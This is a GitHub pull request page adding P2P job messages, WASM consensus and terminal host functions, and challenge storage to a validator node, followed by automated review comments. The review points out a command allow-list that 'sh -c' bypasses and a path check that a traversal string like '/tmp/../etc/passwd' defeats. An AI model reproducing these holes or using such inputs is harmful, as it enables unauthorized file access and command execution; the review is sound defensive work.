Skip to content

feat(infra): add P2P handlers, WASM host functions, and distributed storage for decentralized challenges#45

Closed
echobt wants to merge 4 commits intomainfrom
feat/p2p-wasm-host-infra
Closed

feat(infra): add P2P handlers, WASM host functions, and distributed storage for decentralized challenges#45
echobt wants to merge 4 commits intomainfrom
feat/p2p-wasm-host-infra

Conversation

@echobt
Copy link
Contributor

@echobt echobt commented Feb 18, 2026

Summary

Implement comprehensive P2P infrastructure and WASM host function support so that future WASM challenges can operate end-to-end on the decentralized network without any centralized server. This adds new host function namespaces, extends the P2P message protocol, and enriches consensus state for full challenge lifecycle management.

Changes

WASM Runtime (crates/wasm-runtime-interface/)

  • New consensus.rs: platform_consensus host function namespace with ConsensusPolicy, ConsensusState, and ConsensusHostFunctions — exposes consensus_get_epoch, consensus_get_validators, consensus_propose_weight, consensus_get_votes, consensus_get_state_hash, consensus_get_submission_count, consensus_get_block_height
  • New terminal.rs: platform_terminal host function namespace with TerminalPolicy, TerminalState, and TerminalHostFunctions — implements terminal_exec, terminal_read_file, terminal_write_file, terminal_list_dir, terminal_get_time, terminal_random_seed with path/command allow-listing
  • Updated sandbox.rs: Implement HostFunctionRegistrar for SandboxHostFunctions with real Wasmtime linker registration for sandbox_exec, get_timestamp, log_message
  • Updated runtime.rs: Register all new host function namespaces (consensus, terminal, sandbox, exec, time) in WasmRuntime::instantiate(); add ConsensusState and TerminalState to RuntimeState; add ConsensusPolicy and TerminalPolicy to InstanceConfig

P2P Consensus (crates/p2p-consensus/)

  • Extended P2PMessage enum (appended at end for bincode backward compatibility): JobClaim, JobAssignment, DataRequest, DataResponse, TaskProgress, TaskResult, LeaderboardRequest, LeaderboardResponse, ChallengeUpdate, StorageProposal, StorageVote — with full message structs
  • Extended ChainState: Added leaderboard, active_jobs, task_progress, challenge_storage_roots fields with methods assign_job(), complete_job(), update_leaderboard(), get_leaderboard(), update_task_progress(), update_challenge_storage_root(), cleanup_stale_jobs() — all with proper sequence increment and hash update

Validator Node (bins/validator-node/)

  • New challenge_storage.rs: ChallengeStorageBackend implementing StorageBackend trait backed by real LocalStorage from distributed-storage — replaces NoopStorageBackend for production use
  • Extended main.rs: Handle all new P2P message types in handle_network_event() with proper logging and state updates; add stale job cleanup periodic task (120s interval); handle previously unmatched messages (StateRequest, StateResponse, WeightVote, PeerAnnounce)
  • Updated wasm_executor.rs: Wire ConsensusPolicy and TerminalPolicy into InstanceConfig; upgrade storage backend from NoopStorageBackend to InMemoryStorageBackend

Challenge SDK WASM (crates/challenge-sdk-wasm/)

  • Updated host_functions.rs: Add platform_consensus extern block with all consensus host function imports and safe Rust wrappers (host_consensus_get_epoch, host_consensus_get_validators, host_consensus_propose_weight, etc.)

Notes

  • New P2PMessage variants are added at the end of the enum to maintain bincode serialization backward compatibility
  • No breaking changes to EvaluationInput/EvaluationOutput serialization format
  • ChallengeStorageBackend is placed in validator-node (not wasm-runtime-interface) to avoid a cyclic dependency through distributed-storageplatform-corewasm-runtime-interface

Summary by CodeRabbit

Release Notes

  • New Features

    • Added job assignment and task progress tracking system for distributed challenge evaluation.
    • Introduced per-challenge leaderboards to track miner performance and rankings.
    • Added challenge storage system for persistent data management across challenges.
    • Expanded consensus state access for challenges to query epoch, block height, validators, and votes.
    • Implemented terminal command execution for sandboxed challenge execution environments.
  • Chores

    • Enhanced peer-to-peer messaging infrastructure to support new challenge lifecycle messages.
    • Updated validator node configuration for improved policy management.

echobt and others added 4 commits February 18, 2026 07:25
… exec, and time host functions

- Add consensus and terminal module declarations and re-exports in lib.rs
- Add ConsensusPolicy and TerminalPolicy fields to InstanceConfig with defaults
- Add ConsensusState and TerminalState fields to RuntimeState
- Create consensus_state and terminal_state in instantiate()
- Register exec, time, consensus, terminal, and sandbox host functions in linker
…torage for decentralized challenges

Implement comprehensive P2P infrastructure in platform-v2 so that future WASM
challenges can operate end-to-end without any centralized server. This replaces
the centralized HTTP/PostgreSQL patterns from term-challenge with P2P equivalents.

WASM Runtime (wasm-runtime-interface):
- Add consensus.rs: ConsensusPolicy, ConsensusState, ConsensusHostFunctions with
  platform_consensus namespace (get_epoch, get_validators, propose_weight,
  get_votes, get_state_hash, get_submission_count, get_block_height)
- Add terminal.rs: TerminalPolicy, TerminalState, TerminalHostFunctions with
  platform_terminal namespace (terminal_exec, read_file, write_file, list_dir,
  get_time, random_seed) with path/command allow-listing
- Implement SandboxHostFunctions HostFunctionRegistrar (sandbox.rs) with real
  Wasmtime linker registration for sandbox_exec, get_timestamp, log_message
- Add ChallengeStorageBackend (storage.rs) backed by real LocalStorage from
  distributed-storage, replacing NoopStorageBackend for production use
- Register ConsensusPolicy and TerminalPolicy in InstanceConfig and RuntimeState
- Fix formatting across consensus.rs, sandbox.rs, terminal.rs

P2P Consensus (p2p-consensus):
- Extend ChainState with leaderboard, active_jobs, task_progress, and
  challenge_storage_roots fields for full challenge lifecycle tracking
- Add JobRecord, JobStatus, TaskProgressRecord, LeaderboardEntry types
- Add state methods: assign_job, complete_job, update_leaderboard,
  get_leaderboard, update_task_progress, update_challenge_storage_root,
  cleanup_stale_jobs — all with proper sequence increment
- Add P2PMessage variants (appended at end for bincode compatibility):
  JobClaim, JobAssignment, DataRequest, DataResponse, TaskProgress,
  TaskResult, LeaderboardRequest, LeaderboardResponse, ChallengeUpdate,
  StorageProposal, StorageVote — with full message structs

Validator Node (validator-node):
- Handle all new P2P message types in handle_network_event() with proper
  logging and state updates (JobAssignment creates jobs, TaskProgress
  updates state, etc.)
- Handle previously unmatched messages: StateRequest, StateResponse,
  WeightVote, PeerAnnounce (replacing catch-all debug log)
- Add stale job cleanup periodic task (120s interval)
- Update WasmChallengeExecutor to use InMemoryStorageBackend (upgraded from
  NoopStorageBackend) and wire ConsensusPolicy/TerminalPolicy into config

Challenge SDK WASM (challenge-sdk-wasm):
- Add platform_consensus extern block with all consensus host function imports
- Add safe Rust wrappers: host_consensus_get_epoch, host_consensus_get_validators,
  host_consensus_propose_weight, host_consensus_get_votes, etc.
- Fix minor formatting in host_functions.rs

No breaking changes to existing EvaluationInput/EvaluationOutput serialization.
New P2PMessage variants added at end of enum for backward compatibility.
… dependency

Move ChallengeStorageBackend from wasm-runtime-interface/storage.rs to
bins/validator-node/src/challenge_storage.rs. This resolves the cyclic
dependency: platform-core -> wasm-runtime-interface -> distributed-storage
-> platform-core. The ChallengeStorageBackend depends on distributed-storage
types (LocalStorage, StorageKey, etc.) which validator-node already depends on
directly, so it belongs there rather than in the generic WASM runtime crate.

Add sha2 dependency to validator-node for the hash computation in
propose_write(). Fix clippy needless_borrows_for_generic_args warnings
by removing unnecessary & on hex::encode() calls.
@coderabbitai
Copy link

coderabbitai bot commented Feb 18, 2026

📝 Walkthrough

Walkthrough

This PR introduces a comprehensive job lifecycle and consensus framework for the validator node, adding support for challenge storage, job/task tracking, and new WASM host functions for consensus and terminal operations. It extends P2P messaging with eleven new message types, enhances state management with leaderboards and job records, and integrates policy-driven consensus and terminal execution capabilities into the WASM runtime.

Changes

Cohort / File(s) Summary
Dependency Management
bins/validator-node/Cargo.toml, crates/wasm-runtime-interface/Cargo.toml
Added sha2 workspace dependency; fixed malformed dependency declaration in wasm-runtime-interface.
Challenge Storage Backend
bins/validator-node/src/challenge_storage.rs
New module implementing ChallengeStorageBackend adapter for LocalStorage with get, propose_write (returning SHA-256 hash), and delete operations; converts storage errors to StorageHostError.
Validator Node Main
bins/validator-node/src/main.rs
Integrated challenge_storage module; expanded P2P message handling for 11 new message types (Job, Task, Leaderboard, Storage, Data operations); added periodic stale job cleanup interval; creates and persists JobRecord and TaskProgressRecord on respective events.
WASM Executor Configuration
bins/validator-node/src/wasm_executor.rs
Added ConsensusPolicy and TerminalPolicy fields to WasmChallengeExecutor; propagated policies through instance_config initialization in execute methods.
WASM Host Functions (SDK)
crates/challenge-sdk-wasm/src/host_functions.rs
New public wrapper functions for consensus consensus operations: get_epoch, get_validators, propose_weight, get_votes, get_state_hash, get_submission_count, get_block_height; buffers allocated for array-based results with error propagation.
P2P Consensus Messages
crates/p2p-consensus/src/messages.rs
Added 11 new message type variants to P2PMessage enum (JobClaim, JobAssignment, DataRequest, DataResponse, TaskProgress, TaskResult, LeaderboardRequest/Response, ChallengeUpdate, StorageProposal, StorageVote) with corresponding public struct definitions; added signing_bytes() method to SignedP2PMessage.
P2P Network Message Routing
crates/p2p-consensus/src/network.rs
Extended expected_signer mapping to include all 11 new message variants for signature verification alignment.
P2P State Management
crates/p2p-consensus/src/state.rs
Introduced LeaderboardEntry, JobRecord, JobStatus enum, and TaskProgressRecord; extended ChainState with leaderboard, active_jobs, task_progress, and challenge_storage_roots collections; added assign_job, complete_job, update_leaderboard, update_task_progress, update_challenge_storage_root, and cleanup_stale_jobs methods.
P2P Consensus Public API
crates/p2p-consensus/src/lib.rs
Expanded re-exports to include 11 new message types, JobRecord, JobStatus, LeaderboardEntry, and TaskProgressRecord from messages and state modules.
WASM Runtime Consensus
crates/wasm-runtime-interface/src/consensus.rs
New 438-line module providing consensus host functions (epoch, validators, weight proposals, votes, state hash, submission count, block height); includes ConsensusHostStatus enum, ConsensusPolicy struct with factory methods (default, development, read_only), ConsensusState for tracking chain state, and HostFunctionRegistrar implementation with policy enforcement and WASM memory I/O.
WASM Runtime Terminal
crates/wasm-runtime-interface/src/terminal.rs
New 733-line module providing terminal host functions (exec, read_file, write_file, list_dir, get_time, random_seed); includes TerminalHostStatus enum, TerminalPolicy struct with command/path whitelisting and resource limits, TerminalState for tracking usage, and HostFunctionRegistrar implementation with policy enforcement and per-challenge deterministic seeds.
WASM Runtime Sandbox
crates/wasm-runtime-interface/src/sandbox.rs
Extended with SandboxExecRequest/Response/Error types for command execution; added get_timestamp and log_message host functions; implemented full command execution pipeline with policy validation, timeout enforcement, and stdin/stdout/stderr handling (475 lines total).
WASM Runtime Integration
crates/wasm-runtime-interface/src/runtime.rs, crates/wasm-runtime-interface/src/lib.rs
Updated InstanceConfig with consensus_policy and terminal_policy fields; added consensus_state and terminal_state to RuntimeState; integrated ConsensusHostFunctions, TerminalHostFunctions, and expanded SandboxHostFunctions registration; added public re-exports for new consensus and terminal APIs.

Sequence Diagram(s)

sequenceDiagram
    participant Validator as Validator Node
    participant Consensus as Consensus Module
    participant Storage as LocalStorage
    participant WASM as WASM Runtime
    
    Validator->>Consensus: Receive JobAssignment message
    Consensus->>Consensus: Create JobRecord (submission_id, timeout_at, Pending)
    Consensus->>Storage: Persist job record to state
    Consensus->>Validator: Push state update
    
    loop Every interval
        Validator->>Consensus: Cleanup stale jobs (cleanup_stale_jobs)
        Consensus->>Consensus: Identify jobs past timeout_at
        Consensus->>Consensus: Mark as TimedOut, remove from active_jobs
        Consensus->>Validator: Return cleaned job count
    end
    
    Validator->>Consensus: Receive TaskProgress message
    Consensus->>Consensus: Create TaskProgressRecord (task_index, progress_pct)
    Consensus->>Storage: Update task_progress collection
    Consensus->>Validator: Refresh state hash
Loading
sequenceDiagram
    participant Guest as WASM Guest
    participant HostFunctions as Host Functions Registry
    participant ConsensusState as Consensus State
    participant TerminalState as Terminal State
    participant Policy as Policy Checker
    
    Guest->>HostFunctions: Call consensus_propose_weight(uid, weight)
    HostFunctions->>Policy: Check consensus_policy.allow_weight_proposals
    Policy-->>HostFunctions: Policy enabled?
    HostFunctions->>ConsensusState: Increment weight_proposals_made
    HostFunctions->>Policy: Check max_weight_proposals limit
    Policy-->>HostFunctions: Limit exceeded?
    alt Limit not exceeded
        HostFunctions->>ConsensusState: Record proposed_weight
        HostFunctions-->>Guest: Return Success (0)
    else Limit exceeded
        HostFunctions-->>Guest: Return ProposalLimitExceeded (-2)
    end
    
    Guest->>HostFunctions: Call terminal_exec(cmd)
    HostFunctions->>Policy: Check terminal_policy.allowed_commands
    Policy-->>HostFunctions: Command allowed?
    HostFunctions->>Policy: Check max_executions limit
    Policy-->>HostFunctions: Execution count OK?
    alt All checks pass
        HostFunctions->>TerminalState: Execute command (with timeout)
        HostFunctions->>TerminalState: Update bytes_written
        HostFunctions-->>Guest: Write SandboxExecResponse to WASM memory
    else Policy violation
        HostFunctions-->>Guest: Return TerminalHostStatus error
    end
Loading

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~75 minutes

Possibly related PRs

Poem

🐰 A rabbit hops through storage gates,
Jobs and tasks at every state,
Consensus whispers, terminals sing,
WASM functions dancing in a ring! ✨
State flows deep, like morning dew—
The validator's dream comes true!

🚥 Pre-merge checks | ✅ 2 | ❌ 1

❌ Failed checks (1 warning)

Check name Status Explanation Resolution
Docstring Coverage ⚠️ Warning Docstring coverage is 28.57% which is insufficient. The required threshold is 80.00%. Write docstrings for the functions missing them to satisfy the coverage threshold.
✅ Passed checks (2 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title check ✅ Passed The title clearly summarizes the main changes: adding P2P handlers, WASM host functions, and distributed storage for decentralized challenges, which aligns with the comprehensive infrastructure changes across multiple crates.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

✨ Finishing Touches
  • 📝 Generate docstrings
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Post copyable unit tests in a comment
  • Commit unit tests in branch feat/p2p-wasm-host-infra

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

Copy link

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 11

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
crates/p2p-consensus/src/state.rs (1)

237-261: ⚠️ Potential issue | 🟠 Major

update_hash does not incorporate new state fields, weakening integrity verification.

The HashInput struct only includes sequence, epoch, validator_count, challenge_count, pending_count, and netuid. The newly added fields — leaderboard, active_jobs, task_progress, and challenge_storage_roots — are never reflected in the state hash. This means apply_sync_state (line 745) cannot detect tampering with these fields since the hash verification won't catch modifications.

Consider extending HashInput to include counts or digests of the new collections:

Proposed fix sketch
         #[derive(Serialize)]
         struct HashInput {
             sequence: SequenceNumber,
             epoch: u64,
             validator_count: usize,
             challenge_count: usize,
             pending_count: usize,
             netuid: u16,
+            active_jobs_count: usize,
+            leaderboard_count: usize,
+            task_progress_count: usize,
+            storage_roots_count: usize,
         }
 
         let input = HashInput {
             sequence: self.sequence,
             epoch: self.epoch,
             validator_count: self.validators.len(),
             challenge_count: self.challenges.len(),
             pending_count: self.pending_evaluations.len(),
             netuid: self.netuid,
+            active_jobs_count: self.active_jobs.len(),
+            leaderboard_count: self.leaderboard.len(),
+            task_progress_count: self.task_progress.len(),
+            storage_roots_count: self.challenge_storage_roots.len(),
         };
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/p2p-consensus/src/state.rs` around lines 237 - 261, The state hash in
update_hash currently omits new fields (leaderboard, active_jobs, task_progress,
challenge_storage_roots) so extend the HashInput used in update_hash to include
deterministic representations of those fields (e.g., counts and/or a digest/hash
of their contents) so mutations are reflected in state_hash; update the
HashInput struct to add fields like leaderboard_count/leaderboard_digest,
active_jobs_count/active_jobs_digest, task_progress_count/task_progress_digest,
challenge_storage_roots_count/challenge_storage_roots_digest, populate them from
self (using lengths and a stable serialization + hash for digests via the
existing hash_data helper), and keep apply_sync_state verification working
against the updated state_hash.
🧹 Nitpick comments (2)
crates/p2p-consensus/src/state.rs (1)

656-660: update_task_progress calls update_hash() instead of increment_sequence() — inconsistent with sibling methods.

All other mutation methods (assign_job, complete_job, update_leaderboard, update_challenge_storage_root, cleanup_stale_jobs) call increment_sequence(). This method only calls update_hash(), which won't increment the sequence number. If this is intentional (to reduce sequence churn for frequent progress updates), a brief comment explaining the rationale would help. Otherwise, consider aligning with the other methods.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/p2p-consensus/src/state.rs` around lines 656 - 660, The method
update_task_progress currently calls update_hash() but all other mutating
methods (assign_job, complete_job, update_leaderboard,
update_challenge_storage_root, cleanup_stale_jobs) call increment_sequence();
update_task_progress should be changed to call increment_sequence() after
inserting the record to keep sequence behavior consistent, or if the omission is
intentional add a concise comment in update_task_progress explaining why
sequence should not be incremented (e.g., to avoid sequence churn for frequent
progress updates) so future readers understand the rationale.
bins/validator-node/src/main.rs (1)

799-827: Stub handlers — several new message types are log-only with no processing.

StateRequest, StateResponse, WeightVote, and PeerAnnounce handlers only log and discard the message. For StateRequest in particular, the expected behavior is to respond with the current state. Consider adding TODO comments to track the remaining implementation work.

Would you like me to open issues to track implementing the response logic for these message types?

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@bins/validator-node/src/main.rs` around lines 799 - 827, Handlers for
P2PMessage::StateRequest, P2PMessage::StateResponse, P2PMessage::WeightVote, and
P2PMessage::PeerAnnounce are currently no-ops that only debug-log and drop the
message; add explicit TODO comments and stub call sites and implement immediate
behavior: for P2PMessage::StateRequest(req) call a new or existing
handle_state_request(req) that prepares and sends the current state response,
for P2PMessage::StateResponse(resp) call handle_state_response(resp) to
validate/merge remote state or enqueue for processing, for
P2PMessage::WeightVote(wv) call handle_weight_vote(wv) to validate and apply or
forward the vote, and for P2PMessage::PeerAnnounce(pa) call
handle_peer_announce(pa) to update peer table and dial addresses; include clear
TODO markers in each branch and return early only after invoking the appropriate
handler so future work is tracked and the request/response path for StateRequest
is functional.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@bins/validator-node/src/challenge_storage.rs`:
- Around line 42-46: The current hash construction in the block that creates a
Sha256 hasher (Sha256::new(), then hasher.update(challenge_id.as_bytes()),
hasher.update(key), hasher.update(value), hasher.finalize()) concatenates fields
without delimiters and can cause boundary collisions; change the hashing to
include unambiguous separators or length prefixes (e.g., write the length of
challenge_id, key, and value before each field or insert a fixed sentinel byte
between fields) so the input to hasher.update is canonical and
collision-resistant; update the code around the hasher usage (the hasher
variable and the three hasher.update(...) calls) to apply this length-prefix or
delimiter strategy and then finalize as before.

In `@bins/validator-node/src/main.rs`:
- Around line 874-897: The TaskProgress handler is mutating state without
verifying the progress.signature; before calling state.update_task_progress
(inside the P2PMessage::TaskProgress arm where TaskProgressRecord is built),
validate the signature on progress using the validator's public key and a
canonical serialization of the progress data (e.g., submission_id, challenge_id,
task_index, total_tasks, status, progress_pct, timestamp) and only call
state_manager.apply/update_task_progress if signature verification succeeds; if
verification fails, log and discard the message. Ensure you perform the check on
progress.signature and use the existing signature verification utility in the
codebase (or add one) so the verification occurs prior to creating/updating the
TaskProgressRecord and invoking state.update_task_progress.
- Around line 836-855: Replace the hardcoded 300_000 timeout in the
JobAssignment handler with a named constant (e.g., JOB_ASSIGNMENT_TIMEOUT_MS) to
improve clarity and maintainability: define the constant near related types or
at module scope and use it when computing JobRecord.timeout_at (currently set as
assignment.timestamp + 300_000) so it becomes assignment.timestamp +
JOB_ASSIGNMENT_TIMEOUT_MS; update any related comments or docs and leave
signature verification untouched since it's handled in
handle_gossipsub_message().

In `@crates/challenge-sdk-wasm/src/host_functions.rs`:
- Around line 234-242: The wrappers host_consensus_get_validators,
host_consensus_get_votes and host_consensus_get_state_hash treat a returned
status of 1 (ConsensusHostStatus::Disabled) as success and truncate the buffer;
update each function to treat status == 1 as an error (i.e., return Err(status))
rather than truncating/returning data — only treat genuinely successful status
values as success (e.g., status > 1 for payload-returning calls), and keep the
existing negative-error check; change the conditional around the unsafe
consensus_* call in host_consensus_get_validators, host_consensus_get_votes and
host_consensus_get_state_hash to explicitly return Err(status) when status == 1
(or otherwise not in the valid-success range) so disabled responses are not
misinterpreted as data.

In `@crates/wasm-runtime-interface/src/consensus.rs`:
- Around line 253-274: handle_propose_weight currently only checks uid and
weight are non-negative and then casts them to u16, causing silent truncation;
update handle_propose_weight to validate that both uid and weight are within
u16::MAX before casting (e.g., check uid <= u16::MAX and weight <= u16::MAX),
return ConsensusHostStatus::InvalidArgument.to_i32() if out of range, and only
then cast to u16 when pushing into
caller.data_mut().consensus_state.proposed_weights while leaving the other logic
(policy checks, weight_proposals_made increment) unchanged.
- Around line 30-39: The enum ConsensusHostStatus has a positive value for
Disabled which breaks the SDK convention that non-success statuses are negative;
change ConsensusHostStatus::Disabled to a negative value (e.g., -1 or another
unused negative code) and update any conversion/mapper (e.g., from_i32 or match
arms that map i32→ConsensusHostStatus) to reflect the new negative value so SDK
wrappers that treat status<0 as error work correctly; ensure no other variant
collisions occur when renumbering.

In `@crates/wasm-runtime-interface/src/sandbox.rs`:
- Around line 428-456: The current synchronous write_all to child.stdin after
spawning (in the block referencing cmd.spawn(), has_stdin, request.stdin,
write_all and child.stdin) can deadlock if the child fills stdout/stderr buffers
before reading stdin; move stdin writing off the main thread by spawning a
dedicated thread to take child.stdin, write_all the bytes, and then drop/close
it (or use wait_with_output which concurrently handles stdio) before entering
the existing timeout loop that polls child.try_wait() and uses wait_with_output;
ensure the writer thread is detached or joined appropriately and that errors
from the write are converted to SandboxExecError::ExecutionFailed so the
timeout/kill logic (start, timeout, child.kill,
SandboxExecError::ExecutionTimeout) still functions correctly.

In `@crates/wasm-runtime-interface/src/terminal.rs`:
- Around line 30-43: TerminalHostStatus::Disabled is currently set to a positive
value (1) which breaks the SDK's error-detection pattern (status < 0); change
the Disabled variant in the TerminalHostStatus enum to a negative error code
(e.g., -8 or another unused negative value) so it is treated as an error by SDK
wrappers like host_terminal_exec, and update any related docs/tests/constants
that assume the old value.
- Around line 139-147: The is_path_allowed function currently checks prefixes
with path.starts_with(p) which allows path traversal like "/tmp/../etc/passwd";
change the check to compare normalized/canonicalized paths: normalize the
incoming path (resolve "."/".." components and make it absolute) and normalize
the stored allowed_paths before comparison (or canonicalize both using
std::fs::canonicalize where possible), and on any canonicalization/error return
false; update the same prefix-check logic in the other occurrence of this
permission check so comparisons use normalized absolute paths rather than raw
starts_with.
- Around line 565-600: handle_terminal_random_seed currently uses
chrono::Utc::now() when fixed_timestamp_ms is None which yields
non-deterministic seeds across validators; change to only use deterministic
inputs (challenge_id and a deterministic per-call counter stored on
RuntimeState) and fail if fixed_timestamp_ms is not set or omit timestamp
entirely. Specifically: in handle_terminal_random_seed, remove the chrono::Utc
fallback and instead read a call counter field on RuntimeState (e.g., add or use
runtime_state.terminal_seed_counter), include that counter and challenge_id in
the Sha256 input (hasher.update(counter.to_le_bytes())), then increment and
persist the counter back to caller.data() before returning; if you must use a
timestamp require fixed_timestamp_ms to be Some and return
TerminalHostStatus::InternalError when it is None so seeds remain deterministic
across validators. Ensure the unique symbols mentioned
(handle_terminal_random_seed, fixed_timestamp_ms, RuntimeState,
terminal_seed_counter, write_wasm_memory) are updated accordingly.
- Around line 283-375: handle_terminal_exec currently validates only the first
token (command_name) but then runs the entire cmd_str via "sh -c", and it blocks
on child.wait_with_output(), allowing allowlist bypass and hanging; fix by (1)
rejecting or sanitizing any shell metacharacters in cmd_str or, better, parse
cmd_str into an argv vector and execute the binary directly
(Command::new(&argv[0]).args(&argv[1..])) so no shell interpretation occurs —
update the use of command_name/cmd_str parsing and the spawn call accordingly —
and (2) replace the blocking child.wait_with_output() with a nonblocking timeout
implementation (use child.try_wait() in a loop with
Instant::now()+Duration::from_millis(timeout_ms) and sleep small intervals,
killing the child via child.kill() if deadline exceeded, or run the child on a
background thread and join with a timeout) so timeout_ms is enforced; adjust
error returns/logs in handle_terminal_exec to reflect killed/timeouts.

---

Outside diff comments:
In `@crates/p2p-consensus/src/state.rs`:
- Around line 237-261: The state hash in update_hash currently omits new fields
(leaderboard, active_jobs, task_progress, challenge_storage_roots) so extend the
HashInput used in update_hash to include deterministic representations of those
fields (e.g., counts and/or a digest/hash of their contents) so mutations are
reflected in state_hash; update the HashInput struct to add fields like
leaderboard_count/leaderboard_digest, active_jobs_count/active_jobs_digest,
task_progress_count/task_progress_digest,
challenge_storage_roots_count/challenge_storage_roots_digest, populate them from
self (using lengths and a stable serialization + hash for digests via the
existing hash_data helper), and keep apply_sync_state verification working
against the updated state_hash.

---

Nitpick comments:
In `@bins/validator-node/src/main.rs`:
- Around line 799-827: Handlers for P2PMessage::StateRequest,
P2PMessage::StateResponse, P2PMessage::WeightVote, and P2PMessage::PeerAnnounce
are currently no-ops that only debug-log and drop the message; add explicit TODO
comments and stub call sites and implement immediate behavior: for
P2PMessage::StateRequest(req) call a new or existing handle_state_request(req)
that prepares and sends the current state response, for
P2PMessage::StateResponse(resp) call handle_state_response(resp) to
validate/merge remote state or enqueue for processing, for
P2PMessage::WeightVote(wv) call handle_weight_vote(wv) to validate and apply or
forward the vote, and for P2PMessage::PeerAnnounce(pa) call
handle_peer_announce(pa) to update peer table and dial addresses; include clear
TODO markers in each branch and return early only after invoking the appropriate
handler so future work is tracked and the request/response path for StateRequest
is functional.

In `@crates/p2p-consensus/src/state.rs`:
- Around line 656-660: The method update_task_progress currently calls
update_hash() but all other mutating methods (assign_job, complete_job,
update_leaderboard, update_challenge_storage_root, cleanup_stale_jobs) call
increment_sequence(); update_task_progress should be changed to call
increment_sequence() after inserting the record to keep sequence behavior
consistent, or if the omission is intentional add a concise comment in
update_task_progress explaining why sequence should not be incremented (e.g., to
avoid sequence churn for frequent progress updates) so future readers understand
the rationale.

Comment on lines +42 to +46
let mut hasher = Sha256::new();
hasher.update(challenge_id.as_bytes());
hasher.update(key);
hasher.update(value);
Ok(hasher.finalize().into())
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor

Hash over concatenated fields without delimiters can produce collisions.

SHA256(challenge_id || key || value) without length-prefixed or delimited fields is theoretically susceptible to boundary confusion (e.g., challenge_id="ab" + key=[0x63] produces the same hash input as challenge_id="abc" + key=[]). Practical risk is low if challenge IDs are UUIDs, but for correctness it's worth adding a separator or length prefix.

Proposed fix
         let mut hasher = Sha256::new();
         hasher.update(challenge_id.as_bytes());
+        hasher.update(b":");
         hasher.update(key);
+        hasher.update(b":");
         hasher.update(value);
         Ok(hasher.finalize().into())
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
let mut hasher = Sha256::new();
hasher.update(challenge_id.as_bytes());
hasher.update(key);
hasher.update(value);
Ok(hasher.finalize().into())
let mut hasher = Sha256::new();
hasher.update(challenge_id.as_bytes());
hasher.update(b":");
hasher.update(key);
hasher.update(b":");
hasher.update(value);
Ok(hasher.finalize().into())
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@bins/validator-node/src/challenge_storage.rs` around lines 42 - 46, The
current hash construction in the block that creates a Sha256 hasher
(Sha256::new(), then hasher.update(challenge_id.as_bytes()), hasher.update(key),
hasher.update(value), hasher.finalize()) concatenates fields without delimiters
and can cause boundary collisions; change the hashing to include unambiguous
separators or length prefixes (e.g., write the length of challenge_id, key, and
value before each field or insert a fixed sentinel byte between fields) so the
input to hasher.update is canonical and collision-resistant; update the code
around the hasher usage (the hasher variable and the three hasher.update(...)
calls) to apply this length-prefix or delimiter strategy and then finalize as
before.

Comment on lines +836 to +855
P2PMessage::JobAssignment(assignment) => {
info!(
submission_id = %assignment.submission_id,
challenge_id = %assignment.challenge_id,
assigned_validator = %assignment.assigned_validator.to_hex(),
assigner = %assignment.assigner.to_hex(),
"Received job assignment"
);
let job = JobRecord {
submission_id: assignment.submission_id.clone(),
challenge_id: assignment.challenge_id,
assigned_validator: assignment.assigned_validator,
assigned_at: assignment.timestamp,
timeout_at: assignment.timestamp + 300_000,
status: JobStatus::Pending,
};
state_manager.apply(|state| {
state.assign_job(job);
});
}
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
# Search for signature verification patterns in the codebase
rg -n "verify.*signature|signature.*verify|verify_message|verify_signed" --type=rs -C3

Repository: PlatformNetwork/platform-v2

Length of output: 97


🏁 Script executed:

#!/bin/bash
# Search for timeout constants and magic numbers related to 300000
rg -n "300000|300_000|timeout.*const|TIMEOUT.*=|Job.*timeout" --type=rs | head -30

Repository: PlatformNetwork/platform-v2

Length of output: 97


🏁 Script executed:

#!/bin/bash
# Find where P2PMessage enum is defined and how it's processed
rg -n "enum P2PMessage|handle_network_event|process.*message" --type=rs -A5 | head -50

Repository: PlatformNetwork/platform-v2

Length of output: 97


🏁 Script executed:

#!/bin/bash
# Search for signature verification patterns - look in .rs files
find bins/validator-node/src -name "*.rs" -exec grep -n "verify.*signature\|signature.*verify\|verify_message\|verify_signed" {} + 2>/dev/null

Repository: PlatformNetwork/platform-v2

Length of output: 53


🏁 Script executed:

#!/bin/bash
# Search for timeout constants and the 300_000 magic number
find bins/validator-node/src -name "*.rs" -exec grep -n "300_000\|TIMEOUT\|timeout.*const" {} + 2>/dev/null | head -40

Repository: PlatformNetwork/platform-v2

Length of output: 170


🏁 Script executed:

#!/bin/bash
# Find P2PMessage enum definition and handler structure
find . -name "*.rs" -exec grep -l "enum P2PMessage\|handle_network_event" {} + 2>/dev/null

Repository: PlatformNetwork/platform-v2

Length of output: 143


🏁 Script executed:

#!/bin/bash
# Check the P2PMessage structure in messages.rs
cat crates/p2p-consensus/src/messages.rs | head -150

Repository: PlatformNetwork/platform-v2

Length of output: 5110


🏁 Script executed:

#!/bin/bash
# Search for where messages are received/parsed in main.rs to see if validation happens before the handler
grep -n "handle_network_event\|received.*message\|P2PMessage::" bins/validator-node/src/main.rs | head -20

Repository: PlatformNetwork/platform-v2

Length of output: 1042


🏁 Script executed:

#!/bin/bash
